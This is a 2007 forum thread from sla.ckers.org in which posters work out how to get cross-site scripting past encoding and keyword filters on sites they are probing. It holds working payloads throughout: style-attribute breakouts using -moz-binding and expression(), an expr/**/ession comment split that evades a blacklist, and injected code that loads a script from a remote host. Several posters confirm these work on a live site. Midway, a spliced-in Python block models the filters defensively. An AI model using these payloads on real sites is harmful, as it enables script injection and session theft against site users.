Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Escaping the escapes
Posted by: Mephisto
Date: March 01, 2007 09:39PM

I've noticed on some applications I've come across that the site encodes certain characters to prevent xss attacks, so I'm curious if anyone is familiar with any vectors that bypass these prevention techniques.

1) when entering a value such as ("><script>alert(xss);</script>) to escape outside the value attribute of a textbox, the site is encoding the double quote, so the html source result becomes:

<input type="text" name="a" value="&quot;><script>alert(xss);</script>" size="30" maxlength="255" />

2) Another prevention technique I've seen is the encoding of the < sign, so that when a script tag is entered it becomes:

&lt;script>alert(xss);&lt/script>

anyone come across bypassing these types of prevention techniques?

Re: Escaping the escapes
Date: March 01, 2007 10:24PM

I've been wondering myself as I tend to run into places that filter all non-alphanumeric characters into HTML equivalents, and completely strip any string containing "java", or "script".


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Re: Escaping the escapes
Posted by: blad3
Date: March 02, 2007 01:09AM

Mephisto, there is no way you could escape 1).
Same for 2) but I'm not 100% sure. The human imagination is an amazing thing:P


Re: Escaping the escapes
Posted by: teracci
Date: March 02, 2007 01:15AM

Hi Mephisto,

> <input type="text" name="a" value="&quot;><script>alert(xss);</script>" size="30" maxlength="255" />

If the application has a character encoding problem, you can use malformed US-ASCII or UTF-7 or something to bypass the filter.

US-ASCII: http://ha.ckers.org/blog/20060621/malformed-ascii-bypasses-filters/
UTF-7: http://sla.ckers.org/forum/read.php?3,3109

Otherwise, I think there is no way to bypass it.


Re: Escaping the escapes
Posted by: trev
Date: March 02, 2007 06:04AM

Mephisto, 2) is pretty common and just as commonly they forget to escape the quotes. So if you are already inside a tag you can add the style attribute with -moz-binding (for Gecko browsers) and expression (for IE). E.g. you give the page /" style="-moz-binding:url(http://ha.ckers.org/xssmoz.xml#xss)/ you get:

<input name="text" value="" style="-moz-binding:url(http://ha.ckers.org/xssmoz.xml#xss)">

Often you also see that double quotes are escaped but the page actually uses single quotes for the attribute - which is just as vulnerable.

Re: Escaping the escapes
Posted by: Mephisto
Date: March 02, 2007 05:09PM

I was able to enter something like this to get it to work (" style="x:expression(alert(1))")

I've been testing various style properties, but haven't found one that would actually allow you to include a .js file or image that contains malicious code...anyone done this before? I've tried the "url" ones, behavior, etc...

Re: Escaping the escapes
Posted by: teracci
Date: March 02, 2007 08:26PM

style="background:url(javascript:document.body.appendChild(document.createElement('script')).src='http://hostname/foo.js')"

How is it?

Re: Escaping the escapes
Posted by: Mephisto
Date: March 02, 2007 10:11PM

Most excellent, thanks teracci!

Re: Escaping the escapes
Posted by: rsnake
Date: March 06, 2007 04:50PM

And funny enough I just said the same thing on another post (it may also be vulnerable to variable width encoding): http://ha.ckers.org/blog/20060817/variable-width-encoding/

- RSnake
Gotta love it. http://ha.ckers.org

Re: Escaping the escapes
Posted by: Mephisto
Date: March 17, 2007 05:31PM

okay, found a site where I can put in "</span>" and anything else like that (</div>, </body>, </html>, etc...), but it won't allow the start tags (<span>, <div>, <body>, <html>, etc...) Anyone know of a way around this??

It appears to filter anything that is < and any Aa-Zz character after that.

Update: I can also put in stuff like "< body>", "document.location", "javascript", but it errors on "javascript:"


Re: Escaping the escapes
Posted by: trev
Date: March 17, 2007 06:31PM

How about <<body>? If they use regexps they could easily make this mistake.

Edit: This is http://ha.ckers.org/xss.html#XSS_Extraneous%20open%20brackets btw.


Re: Escaping the escapes
Posted by: hasse
Date: March 17, 2007 06:31PM

Mephisto Wrote:
-------------------------------------------------------
> okay, found a site where I can put in "</span>" and
> anything else like that (</div>, </body>, </html>, etc...), but it
> won't allow the start tags (<span>, <div>, <body>, <html>, etc...) Anyone
> know of a way around this??
>
> It appears to filter anything that is < and any
> Aa-Zz character after that.
>
> Update: I can also put in stuff like "< body>",
> "document.location", "javascript", but it errors
> on "javascript:"

Is it inside a tag from the beginning?

trev Wrote:
-------------------------------------------------------
> How about <<body>? If they use regexps they could easily
> make this mistake.

But shouldn't it catch the <<body> part?


Re: Escaping the escapes
Posted by: trev
Date: March 17, 2007 06:39PM

This seems to work in Firefox:

<\asdf style="-moz-binding:url(http://ha.ckers.org/xssmoz.xml#xss)"> - sorry, doesn't really work.

@hasse: Because it might check "<<" and then continue with "bo".


Re: Escaping the escapes
Posted by: Mephisto
Date: March 17, 2007 08:23PM

@trev - <<body> doesn't work either.

@hasse - The echoed input is placed within a <span></span> tag...

So it looks like this when echoed

<span>Input Here</span>

by inputting "</span>" I can close the span tag, but I can't seem to do much of anything useful with it, like inject another (starting) html tag.

Re: Escaping the escapes
Posted by: trev
Date: March 17, 2007 09:00PM

I ran a test and no browser allows you to put anything between < and the starting letter of the tag. So you cannot start a tag, and without it this hole is harmless. That is, unless you manage to change the encoding of this page (see UTF-7 vector).

Re: Escaping the escapes
Posted by: teracci
Date: March 17, 2007 09:27PM

> It appears to filter anything that is < and any Aa-Zz character after that.

If so, try using NULL character.

<span><[0x00]script>alert()</script></span>

# IE completely ignores NULL chars.

Re: Escaping the escapes
Posted by: Mephisto
Date: March 17, 2007 10:35PM

@trev - the Accept-Charset header is "ISO-8859-1,utf-8;q=0.7,*;q=0.7", since it's defined as utf-8 I'm not sure I can set it to utf-7.

@teracci - the 0x00 null byte didn't work, it just rendered as part of the text. I tried the url encoded null byte version (%00) on another page and it actually caught it and threw an error.

It would appear I can't do much of anything with the type of filtering they have in place.

Re: Escaping the escapes
Posted by: trev
Date: March 18, 2007 06:31AM

Mephisto, the important thing is not the Accept-Charset you are sending but the Content-Type the server sends you. And sometimes it can be manipulated through URL parameters.

teracci, see above - I already tried the null byte and the other 65535 char codes as well. It might be that IE ignores it inside the tag name but it certainly doesn't want to have it between the opening bracket and the name.

Re: Escaping the escapes
Posted by: Hong
Date: March 18, 2007 11:10AM

How about style inside </a>?
</a style="xx:expression(alert('xss'))">

- Hong

Re: Escaping the escapes
Posted by: trev
Date: March 18, 2007 11:46AM

IE accepts attributes on closing tags?????? That's crazy...

Re: Escaping the escapes
Posted by: Mephisto
Date: March 18, 2007 02:12PM

@trev - The content type is "text/html; charset=utf-8"

@Hong - It appears to filter "expression" as well.

Re: Escaping the escapes
Posted by: trev
Date: March 18, 2007 02:17PM

Try http://ha.ckers.org/xss.html#XSS_DIV_background_image_unicode

Re: Escaping the escapes
Posted by: rsnake
Date: March 18, 2007 04:02PM

It filters "expression" but does it filter expr/**/ession ?

- RSnake
Gotta love it. http://ha.ckers.org

Re: Escaping the escapes
Posted by: Mephisto
Date: March 18, 2007 08:08PM

@rsnake - you are my HERO! that worked perfectly.

Now the next task is to try and include a remote script.

I tried this, but it didn't work...

</a style=""xx:expr/**/ession(document.appendChild(document.createElement('script')).src='http://mydomain/s.js')">

Re: Escaping the escapes
Posted by: trev
Date: March 18, 2007 08:53PM

Find out which keyword it is blocking (probably "script") and use the same trick with /**/ again. Or write 'scr'+'ipt'.

Re: Escaping the escapes
Posted by: rsnake
Date: March 18, 2007 08:58PM

You also have two double quotes there, might want to remove those, unless that was just a typo here.

- RSnake
Gotta love it. http://ha.ckers.org

Re: Escaping the escapes
Posted by: Mephisto
Date: March 18, 2007 09:33PM

Yep, I jumped the gun on it...just had to remove the additional double quote and it worked fine...thanks guys!

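Added example, not part of the thread: a small Python model of the filtering strategies discussed above (encoding only the double quote, a keyword blacklist that drops "<" before a letter, and the /**/ comment split against that blacklist) set beside contextual attribute encoding, with a check that reports any attribute the reflected input managed to add to the tag. The sample inputs and the example.invalid URL are constructed; the page templates are assumptions modelled on the markup quoted in the thread.

```python
import html
import re

# Constructed sample inputs modelled on the payload shapes discussed in the
# thread (hypothetical URL); used only to compare the output strategies.
SAMPLES = {
    "dq_breakout": '" style="-moz-binding:url(http://example.invalid/x.xml#x)',
    "comment_split": '" style="xx:expr/**/ession(alert(1))',
    "sq_breakout": "' style='xx:expr/**/ession(alert(1))",
}
KEYWORDS = ("script", "expression", "javascript:")
TEMPLATE_ATTRS = ("type", "name", "value", "size")


def quote_only_filter(value: str) -> str:
    """Strategy 1 from the thread: only the double quote is entity-encoded."""
    return value.replace('"', "&quot;")


def blacklist_filter(value: str) -> str:
    """Keyword blacklist as described later in the thread: drop '<' before a
    letter and delete a few keywords. Quotes are left untouched."""
    value = re.sub(r"<(?=[A-Za-z])", "", value)
    for kw in KEYWORDS:
        value = re.sub(re.escape(kw), "", value, flags=re.IGNORECASE)
    return value


def attr_encode(value: str) -> str:
    """Contextual output encoding for a quoted attribute: & < > " ' all
    become entities, so no input can terminate the attribute value."""
    return html.escape(value, quote=True)


def render(value: str, filt, quote: str = '"') -> str:
    """Model of the vulnerable page: reflect the value inside an attribute."""
    return f'<input type="text" name="a" value={quote}{filt(value)}{quote} size="30">'


def extra_attributes(tag: str, quote: str = '"') -> list:
    """Defender's check: attributes in the rendered tag that the template did
    not write. A non-empty list means the input broke out of the value."""
    names = re.findall(rf"\s([A-Za-z-]+)\s*=\s*{quote}", tag)
    return [n for n in names if n not in TEMPLATE_ATTRS]


def keyword_survives(value: str) -> bool:
    """The /**/ trick: CSS parsers drop comments before reading a property, so
    a blacklist must be applied to the normalised form, not the raw string."""
    return any(kw in re.sub(r"/\*.*?\*/", "", value).lower() for kw in KEYWORDS)
```

Run `extra_attributes(render(s, f, q))` for each sample and filter: only `attr_encode` returns an empty list in every case, and `keyword_survives` shows why a keyword blacklist that inspects the raw string misses the comment-split form.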
Re: Escaping the escapes
Posted by: hackathology
Date: March 27, 2007 12:46AM

RSnake, I tried that and it works. You're right Mephisto, you just have to remove the additional double quotes.

http://hackathology.blogspot.com
